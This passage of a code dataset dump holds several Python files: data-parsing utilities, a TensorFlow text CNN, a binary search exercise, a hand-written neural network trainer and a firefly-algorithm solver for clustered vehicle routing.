self.close()\n\n","sub_path":"VMC_Screens_Selector.py","file_name":"VMC_Screens_Selector.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"266795397","text":"import logging\nimport functools\nimport platform\nimport os\n\nTMP_DIR = os.path.join(\"/tmp\", \"insights-web\")\nlogger = logging.getLogger(__name__)\n\n\ndef defaults(default=None):\n    \"\"\"\n    Catches any exception thrown by the wrapped function and returns `default`\n    instead.\n\n    Parameters\n    ----------\n\n    default : object\n        The default value to return if the wrapped function throws an exception\n    \"\"\"\n    def _f(func):\n        @functools.wraps(func)\n        def __f(self, *args, **kwargs):\n            try:\n                return func(self, *args, **kwargs)\n            except Exception:\n                return default\n        return __f\n    return 
_f\n\n\ndef keys_in(items, *args):\n \"\"\"\n Use this utility function to ensure multiple keys are in one or more\n dicts. Returns `True` if all keys are present in at least one of the\n given dicts, otherwise returns `False`.\n\n :Parameters:\n - `items`: Iterable of required keys\n - Variable number of subsequent arguments, each one being a dict to check.\n \"\"\"\n\n found = dict((key, False) for key in items)\n for d in args:\n for item in items:\n if not found[item] and item in d:\n found[item] = True\n return all(found.values())\n\n\ndef logging_level(logger, level):\n def _f(func):\n @functools.wraps(func)\n def check_log_level(*args, **kwargs):\n if logger.getEffectiveLevel() <= level:\n return func(*args, **kwargs)\n\n return check_log_level\n\n return _f\n\n\ndef make_iter(item):\n if isinstance(item, list):\n return item\n else:\n return [item]\n\n\ndef ensure_dir(path, dirname=False):\n log = logging.getLogger(__name__)\n try:\n if dirname:\n path = os.path.dirname(path)\n log.debug(\"Ensure dir '%s'\", path)\n os.makedirs(path)\n except Exception as e:\n if log.level <= logging.DEBUG:\n log.debug(\"Failed to ensure dir: %s\", e)\n return False\n return True\n\n\ndef _create_log_record(msg, date, level, machine_id):\n log_record = logging.LogRecord(\"upload_client\", logging.getLevelName(level),\n machine_id, None, msg.strip(), None, None)\n log_record.asctime = date\n return log_record\n\n\nclass objectview(object):\n def __init__(self, dict_):\n self.__dict__ = dict_\n\n\ndef parse_table(content, delim=None, max_splits=-1, strip=True):\n \"\"\"\n Parses table-like text. Assumes the first row contains column names.\n Column names cannot contain spaces. Fields cannot be blank.\n \"\"\"\n if not content:\n return []\n if strip:\n cols = [c.strip() for c in content[0].split(delim)]\n else:\n cols = content[0].split(delim)\n r = []\n for row in content[1:]:\n row = row.strip()\n if row:\n if strip:\n parsed = dict(zip(cols, [i.strip() for i in row.split(delim, max_splits)]))\n else:\n parsed = dict(zip(cols, row.split(delim, max_splits)))\n r.append(parsed)\n return r\n\n\ndef parse_keypair_lines(content, delim='|', kv_sep='='):\n \"\"\"\n Parses a set of entities, where each entity is a set of key-value pairs\n contained all on one line. 
Each entity is parsed into a dictionary and\n added to the list returned from this function.\n \"\"\"\n r = []\n if content:\n for row in [line for line in content if line]:\n item_dict = {}\n for item in row.split(delim):\n key, value = [i.strip(\"'\\\"\").strip() for i in item.strip().split(kv_sep)]\n item_dict[key] = value\n r.append(item_dict)\n return r\n\n\ndef rsplit(_str, seps):\n \"\"\"\n Splits _str by the first sep in seps that is found from the right side.\n Returns a tuple without the separator.\n \"\"\"\n for idx, ch in enumerate(reversed(_str)):\n if ch in seps:\n return _str[0:-idx - 1], _str[-idx:]\n\n\ndef check_path(path):\n found = os.path.exists(path)\n logger.debug(\"Checking for path [%s], found = %s.\", path, found)\n return found\n\n\ndef get_addr():\n from insights.settings import web as config\n\n return \"http://%s:%s\" % (platform.node(), config[\"port\"])\n\n\ndef get_path_for_system_id(category, system_id):\n return os.path.join(TMP_DIR, category, system_id[:2], system_id)\n\n\ndef word_wrap(line, wrap_len=72):\n if len(line) > wrap_len:\n for i, c in enumerate(reversed(line[:wrap_len])):\n if c == \" \":\n break_point = wrap_len - i\n yield line[:break_point].strip()\n for more in word_wrap(line[break_point:], wrap_len):\n yield more\n break\n else:\n yield line.strip()\n","sub_path":"insights/util/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"95436021","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n# author : Apollo2Mars@gmail.com\n# Problems : inputs and terms\n\nimport tensorflow as tf\n\n\nclass TextCNN(object):\n def __init__(self, args, tokenizer, embedding_matrix):\n self.vocab_size = len(tokenizer.word2idx) + 2\n self.seq_len = args.max_seq_len\n self.emb_dim = args.emb_dim\n self.hidden_dim = args.hidden_dim\n self.batch_size = args.batch_size\n self.filters_num = args.filters_num\n self.filters_size = args.filters_size\n self.class_num = len(str(args.label_list).split(','))\n self.learning_rate = args.learning_rate\n\n self.input_x = tf.placeholder(dtype=tf.int32, shape=[None, self.seq_len], name='input_x')\n self.input_term = tf.placeholder(dtype=tf.int32, shape=[None, self.seq_len], name='input_term')\n self.input_y = tf.placeholder(dtype=tf.float32, shape=[None, self.class_num], name='input_y')\n self.global_step = tf.placeholder(shape=(), dtype=tf.int32, name='global_step')\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n\n self.embedding_matrix = embedding_matrix\n self.cnn()\n\n def cnn(self):\n with tf.device('/cpu:0'):\n emb_input = tf.Variable(tf.constant(0.0, shape=[self.vocab_size, self.emb_dim]), trainable=True, name=\"embedding_input\")\n self.ph_input = tf.placeholder(tf.float32, [self.vocab_size, self.emb_dim])\n self.input_init = emb_input.assign(self.ph_input)\n inputs = tf.nn.embedding_lookup(emb_input, self.input_x)\n\n emb_term = tf.Variable(tf.constant(0.0, shape=[self.vocab_size, self.emb_dim]), trainable=True, name=\"embedding_term\")\n self.ph_term = tf.placeholder(tf.float32, [self.vocab_size, self.emb_dim])\n self.term_init = emb_term.assign(self.ph_term)\n terms = tf.nn.embedding_lookup(emb_term, self.input_term)\n\n inputs_with_terms = tf.concat([inputs, terms], -1)\n\n with tf.name_scope('conv'):\n pooled_outputs = []\n for i, filter_size in enumerate(self.filters_size):\n with tf.variable_scope(\"conv-maxpool-%s\" % filter_size, reuse=False):\n conv = 
tf.layers.conv1d(inputs_with_terms, self.filters_num, filter_size, name='conv1d')\n pooled = tf.reduce_max(conv, axis=[1], name='gmp')\n pooled_outputs.append(pooled)\n outputs = tf.concat(pooled_outputs, 1)\n\n with tf.name_scope(\"fully-connect\"):\n fc = tf.layers.dense(outputs, self.hidden_dim, name='fc1')\n fc = tf.nn.relu(fc)\n fc = tf.nn.dropout(fc, self.keep_prob)\n\n with tf.name_scope(\"logits\"):\n logits = tf.layers.dense(fc, self.class_num, name='fc2')\n softmax = tf.nn.softmax(logits, name=\"my_output\")\n self.outputs = tf.argmax(softmax, 1, name='predict')\n\n with tf.name_scope(\"loss\"):\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=self.input_y)\n loss = tf.reduce_mean(loss)\n\n with tf.name_scope(\"optimizer\"):\n self.trainer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(loss)\n tf.summary.scalar('loss', loss)\n\n\n config = tf.ConfigProto() \n config.gpu_options.allow_growth = True \n session = tf.Session(config=config)\n session.run(tf.global_variables_initializer())\n session.run(self.input_init, feed_dict={self.ph_input: self.embedding_matrix})\n session.run(self.term_init, feed_dict={self.ph_term: self.embedding_matrix})\n self.session = session\n\n","sub_path":"classification/models/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566602572","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 25\n\n@author: Xiang Li\n\"\"\"\n\n\"\"\"You're going to write a binary search function.\nYou should use an iterative approach - meaning\nusing loops.\n\nYour function should take two inputs:\na Python list to search through, and the value\nyou're searching for.\n\nAssume the list only has distinct elements,\nmeaning there are no repeated values, and \nelements are in a strictly increasing order.\n\nReturn the index of value, or -1 if the value\ndoesn't exist in the list.\"\"\"\n\ndef binary_search(input_array, value):\n \"\"\"Your code goes here.\"\"\"\n left = 0 # left mark\n right = len(input_array) # right mark\n middle = right//2 -1\n \n while input_array[left:right]: # iterate until slice empty array\n\n middle = (right+left)//2 # get middle index\n if input_array[middle] == value:\n return middle\n elif input_array[middle] > value:\n right = middle # update right mark\n elif input_array[middle] < value:\n left = middle+1 #update left mark\n\n return -1 \n\n\n#%%\ntest_list = [1,3,9,11,15,19,29]\ntest_val1 = 25\ntest_val2 = 15\nprint(binary_search(test_list, test_val1))\nprint(binary_search(test_list, test_val2))","sub_path":"udacity_technical_interview/05_binary_search_practice.py","file_name":"05_binary_search_practice.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"614244974","text":"from node import node\r\nfrom layer import layer\r\nimport numpy as np\r\n\r\nclass network():\r\n def __init__(self,all_layer_list,backpropagation_method,batch_size,regulariastion_val,descent_rate):\r\n ''' Argument 1: (list)Give the list of all layer sequentially in a list eg(input_layer,hidden_layer1,... ... 
,hidden_layer_last,output_layer)\r\n Argument 2: (String)This argument will let the network know if we are backpropagating batch wise or stochastically\r\n Argument 3: (integer) In case of batch gradient descent give the size of batch or in case of stochastic descent give the data_input size'''\r\n self.all_layer_tup=tuple(all_layer_list)\r\n self.backpropagation_method=backpropagation_method\r\n self.batch_size=float(batch_size)\r\n self.lambda_val=float(regulariastion_val)\r\n self.alpha_rate=float(descent_rate)\r\n \r\n # MODIFY DURING NEW SETUP(IMPORTANT)\r\n #During the final implementation phase where we feed the neural net with our data.\r\n def initialize_input_output_layer(self,list_of_input,list_of_output):\r\n ''' In list of input and output: if a subunit is biased then give empty tuple '''\r\n #both X val and Y val for new elemnt of output layer\r\n for i,sub_unit in enumerate(self.all_layer_tup[0].sub_units):\r\n shape_current_unit=sub_unit.shape\r\n if self.all_layer_tup[0].bias_property[i]=='un_biased':\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n #print len(list_of_input[i]),shape_current_unit[1],j,k\r\n #print (shape_current_unit[1])*j+k\r\n sub_unit[j][k].a_val=list_of_input[i][(shape_current_unit[1])*j+k]\r\n \r\n for i,sub_unit in enumerate(self.all_layer_tup[-1].sub_units):\r\n shape_current_unit=sub_unit.shape\r\n #print shape_current_unit\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n #print list_of_output[i]\r\n #print 'i:',i,',j:',j,',k:',k,list_of_output[i][(shape_current_unit[1])*j+k],'\\n'\r\n sub_unit[j][k].Y=list_of_output[i][(shape_current_unit[1])*j+k]\r\n \r\n #There is no need to create a new network and set the Thetas from previous network. 
We will just initialize this present network \r\n # to the state that just by initializing the input_layer with new batch we can resume our work.\r\n def in_batch_initialize_network(self):\r\n ''' To set the network to initial state to start a fresh epoch cycle by reseting all the variable '''\r\n for layer in self.all_layer_tup:\r\n for i,sub_unit in enumerate(layer.sub_units):\r\n shape_current_unit=sub_unit.shape\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n if layer.layer_type=='hidden':\r\n sub_unit[j][k].error_delta=0\r\n if layer.bias_property[i]=='un_biased':\r\n sub_unit[j][k].a_val=0\r\n sub_unit[j][k].z_val=0\r\n elif layer.layer_type=='output':\r\n sub_unit[j][k].error_delta=0\r\n sub_unit[j][k].a_val=0\r\n sub_unit[j][k].z_val=0\r\n \r\n def batch_initialize_network(self):\r\n '''We have to re-initialize the \"gradient\" to zero whenever a new batch is starting \r\n unlike just initialization of network element like error_delta and a_val in input and y_val in oytput and other node val to zero\r\n to accomodate the change in example'''\r\n for layer in self.all_layer_tup:\r\n if layer.layer_type != 'output':\r\n for i,sub_unit in enumerate(layer.sub_units):\r\n shape_current_unit=sub_unit.shape\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n foreward_subunit_num=len(sub_unit[j][k].Gradient)\r\n for l in range(foreward_subunit_num):\r\n grad_shape=sub_unit[j][k].Gradient[l].shape\r\n if grad_shape!=(0,0):\r\n for m in range(grad_shape[0]):\r\n for n in range(grad_shape[1]):\r\n sub_unit[j][k].Gradient[l][m][n]=0\r\n elif layer.layer_type=='output':\r\n layer.cost_incurred=0\r\n \r\n def network_foreward_propagate(self):\r\n for i,layer in enumerate(self.all_layer_tup):\r\n #print i,len(self.all_layer_tup),self.all_layer_tup[i+1]\r\n if layer.layer_type=='input':\r\n layer.layer_foreward_propagate(self.all_layer_tup[i+1])\r\n elif layer.layer_type=='hidden':\r\n layer.inlayer_foreward_propagate()\r\n layer.layer_foreward_propagate(self.all_layer_tup[i+1])\r\n elif layer.layer_type=='output':\r\n layer.inlayer_foreward_propagate()\r\n \r\n #(IMPORTANT) Calculate the cost function and DONT divide by the batch size.(or while implementing) in final script (to full cost as I have divided the m factor from regularisation part also.)\r\n \r\n def network_back_propagate(self):\r\n for reversed_layer in reversed(self.all_layer_tup):\r\n if reversed_layer.layer_type=='output':\r\n reversed_layer.layer_back_propagate('none')\r\n elif reversed_layer.layer_type=='hidden':\r\n #print self.all_layer_tup[i+1]\r\n reversed_layer.layer_back_propagate(self.all_layer_tup[self.all_layer_tup.index(reversed_layer)+1])\r\n reversed_layer.inlayer_back_propagate()\r\n elif reversed_layer.layer_type=='input':\r\n reversed_layer.layer_back_propagate(self.all_layer_tup[self.all_layer_tup.index(reversed_layer)+1])\r\n \r\n ## The regulization term is added here not in network part of gradietnt descent.\r\n def start_gradient_descent(self):\r\n num_units=len(self.all_layer_tup)\r\n output_layer=self.all_layer_tup[num_units-1]\r\n for i,layer in enumerate(self.all_layer_tup):\r\n #print i\r\n if layer.layer_type != 'output':\r\n for unit_index,sub_unit in enumerate(layer.sub_units):\r\n #print unit_index\r\n shape_current_unit=sub_unit.shape\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n for theta_index,theta in enumerate(sub_unit[j][k].Theta):\r\n shape_theta=theta.shape\r\n if 
(shape_theta[0]+shape_theta[1])>0:\r\n for l in range(shape_theta[0]):\r\n for m in range(shape_theta[1]):\r\n if layer.bias_property[unit_index] != 'biased':\r\n #Adding the regularisation Cost to the net cost\r\n #print ((self.lambda_val/(2*self.batch_size))*(sub_unit[j][k].Theta[theta_index].item(l,m)**2))\r\n output_layer.cost_incurred=output_layer.cost_incurred+((self.lambda_val/(2*self.batch_size))*(sub_unit[j][k].Theta[theta_index].item(l,m)*sub_unit[j][k].Theta[theta_index].item(l,m)))\r\n #print i,unit_index,j,k,l,m\r\n sub_unit[j][k].Gradient[theta_index][l][m]=sub_unit[j][k].Gradient[theta_index].item(l,m)+((self.lambda_val/self.batch_size)*sub_unit[j][k].Theta[theta_index].item(l,m))\r\n sub_unit[j][k].Theta[theta_index][l][m]=sub_unit[j][k].Theta[theta_index].item(l,m)-((self.alpha_rate)*sub_unit[j][k].Gradient[theta_index].item(l,m))\r\n \r\n #def calculate_cost(self):","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"296634314","text":"import argparse\nimport copy\nimport cProfile\nimport distance\nimport math\nimport numpy as np\nimport os\nimport re\nimport sys\nimport time\nimport xml.etree.ElementTree as ET\n\ndef confirm_input(fname):\n while True:\n choice = input(\"delete previous '{}' ?[y/n]: \".format(fname)).lower()\n if choice == 'y':\n return True\n elif choice == 'n':\n sys.exit()\n\ndef calc_EUCdistance(a, b):#a, b: customers\n d = math.sqrt((a[0]-b[0])**2 + (a[1]-b[1])**2)\n return d\n\ndef extract_xmldata(bmark):\n tree = ET.parse('{}'.format(bmark))\n root = tree.getroot()\n\n coordx = []\n coordy = []\n for x in root.iter('CoordX'):\n x = int(x.text)\n coordx.append(x)\n for y in root.iter('CoordY'):\n y = int(y.text)\n coordy.append(y)\n coord = [(x,y) for x,y in zip(coordx, coordy)]\n\n forbidden_i = []\n forbidden_j = []\n #forbidden_i to forbidden_j\n for i in root.iter('est1'):\n i = int(i.text)\n forbidden_i.append(i)\n for j in root.iter('est2'):\n j = int(j.text)\n forbidden_j.append(j)\n forbidden = [(i, j) for i, j in zip(forbidden_i, forbidden_j)]\n\n cluster = set()\n for i in root.iter('Cluster'):\n i = int(i.text)\n cluster.add(i)\n\n dem_ent = []\n dem_rec = []\n for i in root.iter('DemEnt'):\n i = int(i.text)\n dem_ent.append(i)\n for j in root.iter('DemRec'):\n j = int(j.text)\n dem_rec.append(j)\n # demand = [dem_ent[i] + dem_rec[i] for i in range(len(dem_ent))]\n\n return coord, forbidden, cluster, dem_ent, dem_rec\n\n\nclass Firefly:\n def __init__(self, tour, capacity):\n self.VEHICLE_CAPACITY = capacity\n ###TIME (second)[start, end]\n self.DELIVERY_TIME = [6*60*60, 15*60*60]\n self.PEAK_TIME = [8*60*60, 10*60*60]\n ###\n init_tour = copy.deepcopy(tour)\n tour2routes = [i for i in range(len(tour))]\n np.random.shuffle(tour2routes)\n for i in range(len(tour)):\n np.random.shuffle(init_tour[i])\n self.update(init_tour, tour2routes)\n def update(self, tour, tour2routes):\n routes, luminosity = self.evaluate(tour, tour2routes)\n self.tour = tour\n self.tour2routes = tour2routes\n self.routes = routes\n self.luminosity = luminosity\n def evaluate(self, tour, tour2routes):\n \"\"\"\n tour: the permutation of customers in clusters\n and\n routes: the permutation of customers separated by zero\n If routes is coming, this function converts tour into routes.\n \"\"\"\n global off_peak, peak, clustered_dem_ent\n routes = []\n load_amount = 0\n routes.append(0)\n for cluster in tour2routes:\n if 
self.VEHICLE_CAPACITY < load_amount+clustered_dem_ent[cluster+1]:\n routes.append(0)\n for customer in tour[cluster]:\n routes.append(customer)\n load_amount = clustered_dem_ent[cluster+1]\n else:\n for customer in tour[cluster]:\n routes.append(customer)\n load_amount += clustered_dem_ent[cluster+1]\n routes.append(0)\n\n # for i, demand in enumerate(clustered_dem_ent):\n # if self.VEHICLE_CAPACITY < load_amount+demand:\n # routes.append(0)\n # for customer in tour[i-1]:\n # routes.append(customer)\n # load_amount = demand\n # else:\n # if i == 0:\n # routes.append(0)\n # else:\n # for customer in tour[i-1]:\n # routes.append(customer)\n # load_amount += demand\n # routes.append(0)\n\n luminosity = 0\n triptime = self.DELIVERY_TIME[0]\n for i in range(len(routes)-1):\n if routes[i] == 0:\n if triptime < 200000 and self.DELIVERY_TIME[1] < triptime:\n luminosity += 200000\n luminosity += triptime - self.DELIVERY_TIME[0]\n triptime = self.DELIVERY_TIME[0]\n if self.PEAK_TIME[0] <= triptime and triptime <= self.PEAK_TIME[1]:\n triptime += peak[routes[i]][routes[i+1]]\n else:\n triptime += off_peak[routes[i]][routes[i+1]]\n luminosity += triptime - self.DELIVERY_TIME[0]\n\n return routes, luminosity\n\n\ndef make_costtable(forbidden):\n global coord\n off_peak = [['' for j in range(len(coord))] for i in range(len(coord))]\n peak = [['' for j in range(len(coord))] for i in range(len(coord))]\n for i in range(len(coord)-1):\n for j in range(i+1, len(coord)):\n off_peak[i][j] = calc_EUCdistance(coord[i], coord[j])\n if j % 2 == 1:\n off_peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 1.2\n else:\n off_peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 0.8\n for i in range(len(coord)-1):\n for j in range(i+1, len(coord)):\n peak[i][j] = calc_EUCdistance(coord[i], coord[j]) * 1.3\n if j % 2 == 1:\n peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 1.2 * 1.2\n else:\n peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 0.8 * 1.4\n\n for forb in forbidden:\n off_peak[forb[0]][forb[1]] = 200000\n peak[forb[0]][forb[1]] = 200000\n\n return off_peak, peak\n\ndef insertion_function(a, b, gamma, iteration): #a moves. 
a, b:firefly\n a2 = [customer for cluster in a.tour for customer in cluster]\n b2 = [customer for cluster in b.tour for customer in cluster]\n #customer\n customer_d = distance.hamming(a2, b2)\n customer_n = int(customer_d * gamma ** iteration)\n # customer_n = distance.hamming(a.routes, b.routes)\n if customer_n <= 2:\n customer_n = 2\n else:\n customer_n = np.random.randint(2, customer_n)\n #cluster\n cluster_d = distance.hamming(a.tour2routes, b.tour2routes)\n cluster_n = 0\n if cluster_d != 0:\n cluster_n = np.random.randint(0, cluster_d)\n\n acopy = copy.deepcopy(a)\n best_firefly = copy.deepcopy(a)\n\n for i in range(cluster_n):#cluster insertion\n rand_from = np.random.randint(0, len(acopy.tour2routes))\n rand_into = np.random.randint(0, len(acopy.tour2routes))\n insert_elm = acopy.tour2routes.pop(rand_from)\n acopy.tour2routes.insert(rand_into, insert_elm)\n acopy.update(acopy.tour, acopy.tour2routes)\n if acopy.luminosity < best_firefly.luminosity:\n best_firefly = copy.deepcopy(acopy)\n for i in range(customer_n):#customer insertion\n rand_cluster = np.random.randint(0, len(acopy.tour))\n rand_from = np.random.randint(0, len(acopy.tour[0]))\n rand_into = np.random.randint(0, len(acopy.tour[0]))\n insert_elm = acopy.tour[rand_cluster].pop(rand_from)\n acopy.tour[rand_cluster].insert(rand_into, insert_elm)\n acopy.update(acopy.tour, acopy.tour2routes)\n if acopy.luminosity < best_firefly.luminosity:\n best_firefly = copy.deepcopy(acopy)\n\n return best_firefly.tour, best_firefly.tour2routes\n\ndef beta_step(a, b, gamma, delta):#a, b: class Firefly\n a_tour = [a.tour[cluster] for cluster in a.tour2routes]\n b_tour = [b.tour[cluster] for cluster in b.tour2routes]\n a2 = [customer for cluster in a.tour for customer in cluster]\n b2 = [customer for cluster in b.tour for customer in cluster]\n cluster_d = distance.hamming(a.tour2routes, b.tour2routes)\n cluster_beta = 1 / (1 + delta * cluster_d * cluster_d)\n customer_d = distance.hamming(a2, b2)\n customer_beta = 1 / (1 + gamma * customer_d * customer_d)\n cluster_dic = {cluster:'NOT_VISIT' for cluster in a.tour2routes}\n customer_dic = {customer:'NOT_VISIT' for customer in a2}\n\n new_t2r = ['' for i in range(len(a.tour2routes))]\n new_tour = [['' for j in cluster] for cluster in a_tour]\n\n idx_t2r = [i for i in range(len(a.tour2routes))]\n idx_tour = [[j for j in range(len(a_tour[0]))] for i in range(len(a_tour))]\n insert_t2r = [elm for elm in a.tour2routes]\n insert_tour = [[i*len(a_tour[0])+j+1 for j in range(len(a_tour[0]))] for i in range(len(a_tour))]\n # print(insert_tour)\n\n for i in reversed(idx_t2r):\n if a.tour2routes[i] == b.tour2routes[i]:\n new_t2r[i] = a.tour2routes[i]\n cluster_dic[new_t2r[i]] = 'VISITED'\n idx_t2r.remove(i)\n insert_t2r.remove(new_t2r[i])\n for i in a.tour2routes:\n for j in reversed(idx_tour[i]):\n if a.tour[i][j] == b.tour[i][j]:\n new_tour[i][j] = a.tour[i][j]\n customer_dic[new_tour[i][j]] = 'VISITED'\n idx_tour[i].remove(j)\n insert_tour[i].remove(new_tour[i][j])\n\n np.random.shuffle(idx_t2r)\n for i in range(len(idx_tour)):\n np.random.shuffle(idx_tour[i])\n\n for idx in reversed(idx_t2r):\n if np.random.rand() < cluster_beta:\n if cluster_dic[b.tour2routes[idx]] == 'NOT_VISIT':\n new_t2r[idx] = b.tour2routes[idx]\n cluster_dic[new_t2r[idx]] = 'VISITED'\n idx_t2r.remove(idx)\n insert_t2r.remove(new_t2r[idx])\n elif cluster_dic[a.tour2routes[idx]] == 'NOT_VISIT':\n new_t2r[idx] = a.tour2routes[idx]\n cluster_dic[new_t2r[idx]] = 'VISITED'\n idx_t2r.remove(idx)\n 
insert_t2r.remove(new_t2r[idx])\n        else:\n            if cluster_dic[a.tour2routes[idx]] == 'NOT_VISIT':\n                new_t2r[idx] = a.tour2routes[idx]\n                cluster_dic[new_t2r[idx]] = 'VISITED'\n                idx_t2r.remove(idx)\n                insert_t2r.remove(new_t2r[idx])\n            elif cluster_dic[b.tour2routes[idx]] == 'NOT_VISIT':\n                new_t2r[idx] = b.tour2routes[idx]\n                cluster_dic[new_t2r[idx]] = 'VISITED'\n                idx_t2r.remove(idx)\n                insert_t2r.remove(new_t2r[idx])\n    for i, idx_cluster in enumerate(idx_tour):\n        for j in reversed(idx_cluster):\n            if np.random.rand() < customer_beta:\n                if customer_dic[b.tour[i][j]] == 'NOT_VISIT':\n                    new_tour[i][j] = b.tour[i][j]\n                    customer_dic[new_tour[i][j]] = 'VISITED'\n                    idx_cluster.remove(j)\n                    insert_tour[i].remove(new_tour[i][j])\n                elif customer_dic[a.tour[i][j]] == 'NOT_VISIT':\n                    new_tour[i][j] = a.tour[i][j]\n                    customer_dic[new_tour[i][j]] = 'VISITED'\n                    idx_cluster.remove(j)\n                    insert_tour[i].remove(new_tour[i][j])\n            else:\n                if customer_dic[a.tour[i][j]] == 'NOT_VISIT':\n                    new_tour[i][j] = a.tour[i][j]\n                    customer_dic[new_tour[i][j]] = 'VISITED'\n                    idx_cluster.remove(j)\n                    insert_tour[i].remove(new_tour[i][j])\n                elif customer_dic[b.tour[i][j]] == 'NOT_VISIT':\n                    new_tour[i][j] = b.tour[i][j]\n                    customer_dic[new_tour[i][j]] = 'VISITED'\n                    idx_cluster.remove(j)\n                    insert_tour[i].remove(new_tour[i][j])\n\n    for i, insert_elm in zip(idx_t2r, insert_t2r):\n        new_t2r[i] = insert_elm\n    for i in range(len(idx_tour)):\n        for j, insert_elm in zip(idx_tour[i], insert_tour[i]):\n            new_tour[i][j] = insert_elm\n\n    return new_tour, new_t2r\n\ndef alpha_step1(a, alpha): #a:firefly\n    cluster_size = len(a.tour)\n    customer_size = len(a.tour[0])\n\n    if a.luminosity < 200000:\n        feasible = True\n    else:\n        feasible = False\n    i=0\n    z = np.random.randint(0, cluster_size)\n    while i < alpha:\n        x = np.random.randint(0, customer_size)\n        y = np.random.randint(0, customer_size)\n        a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n        a.update(a.tour, a.tour2routes)\n        if a.luminosity > 200000 and feasible == True:  # the mutation broke a feasible solution, so revert the swap\n            a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n            i-=1\n        i+=1\n\n    return a.tour, a.tour2routes\n\ndef alpha_step2(a, alpha):\n    cluster_size = len(a.tour)\n    customer_size = len(a.tour[0])\n    if customer_size < alpha:\n        sys.exit(\"error: alpha(v2) is greater than the customer size\")\n    if a.luminosity < 200000:\n        feasible = True\n    else:\n        feasible = False\n    while True:\n        idxs = [i for i in range(customer_size)]\n        np.random.shuffle(idxs)\n        x = idxs[0:alpha]\n        y = idxs[0:alpha]\n        z = np.random.randint(0, cluster_size)\n        np.random.shuffle(y)\n        for i in range(alpha):\n            a.tour[z][x[i]], a.tour[z][y[i]] = a.tour[z][y[i]], a.tour[z][x[i]]\n        a.update(a.tour, a.tour2routes)\n        if a.luminosity > 200000 and feasible == True:\n            for i in range(alpha):\n                a.tour[z][x[i]], a.tour[z][y[i]] = a.tour[z][y[i]], a.tour[z][x[i]]\n            continue\n        break\n    return a.tour, a.tour2routes\n\ndef alpha_step4(a, alpha, t, step, schedule):\n    if schedule == \"linear\":\n        segment = len(a.tour[0]) - (t//step)\n    elif schedule == \"sqrt\":\n        segment = int(len(a.tour[0]) - (t//step)**(1/2))\n    if segment < 2:\n        segment = 2\n    if a.luminosity < 200000:\n        feasible = True\n    else:\n        feasible = False\n    origin = np.random.randint(0, len(a.tour[0]))\n    end = origin + segment\n    z = np.random.randint(0, len(a.tour))\n    for i in range(alpha):\n        x = np.random.randint(origin, end+1) % len(a.tour[0])\n        y = np.random.randint(origin, end+1) % len(a.tour[0])\n        a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n        a.update(a.tour, a.tour2routes)\n        if a.luminosity > 200000 and feasible == True:\n            a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n    return a.tour, a.tour2routes\n\n
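The alpha steps above share a shrinking-window idea: as the iteration counter t grows, the segment of customers eligible for swaps narrows, moving the search from exploration toward exploitation. The two schedules in standalone form (an illustrative sketch mirroring the code, not the exact functions):

def segment_size(n_customers, t, step, schedule="linear"):
    # window shrinks with the iteration count, floored at 2 customers
    if schedule == "linear":
        seg = n_customers - t // step
    else:  # "sqrt": shrinks much more slowly
        seg = int(n_customers - (t // step) ** 0.5)
    return max(seg, 2)

assert segment_size(17, 0, 1) == 17                  # full window at the start
assert segment_size(17, 100, 1, "sqrt") == 7         # 17 - sqrt(100)
assert segment_size(17, 100, 1, "linear") == 2       # clamped at the floor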
# Alpha step: exploration (v5)\ndef alpha_step5(a, alpha, t, step, schedule):\n    if schedule == \"linear\":\n        segment = len(a.tour[0]) - (t//step)\n    elif schedule == \"sqrt\":\n        segment = int(len(a.tour[0]) - (t//step)**(1/2))\n    if segment < 2:\n        segment = 2\n    if alpha > segment:\n        alpha = segment\n    origin = np.random.randint(0, len(a.tour[0]))\n    end = origin + segment\n    idxs = [i % len(a.tour[0]) for i in range(origin, end)]\n    np.random.shuffle(idxs)\n    alpha = int(alpha)\n    x = idxs[0:alpha]\n    y = idxs[0:alpha]\n    np.random.shuffle(y)\n    z = np.random.randint(0, len(a.tour))\n    for i in range(alpha):\n        a.tour[z][x[i]], a.tour[z][y[i]] = a.tour[z][y[i]], a.tour[z][x[i]]\n    return a.tour, a.tour2routes\n\ndef firefly_algorithm(**kwargs):\n    if kwargs['p']:\n        print(kwargs)\n    capa_dict = {\"50_1_1\":240, \"50_1_2\":160, \"50_1_3\":240, \"50_1_4\":160,\n                \"50_2_1\":240, \"50_2_2\":160, \"50_2_3\":240, \"50_2_4\":160,\n                \"80_1\":240, \"80_2\":160, \"80_3\":240, \"50_4\":160,\n                \"100_1\":140, \"100_2\":260, \"100_3\":320}\n    CAPACITY = 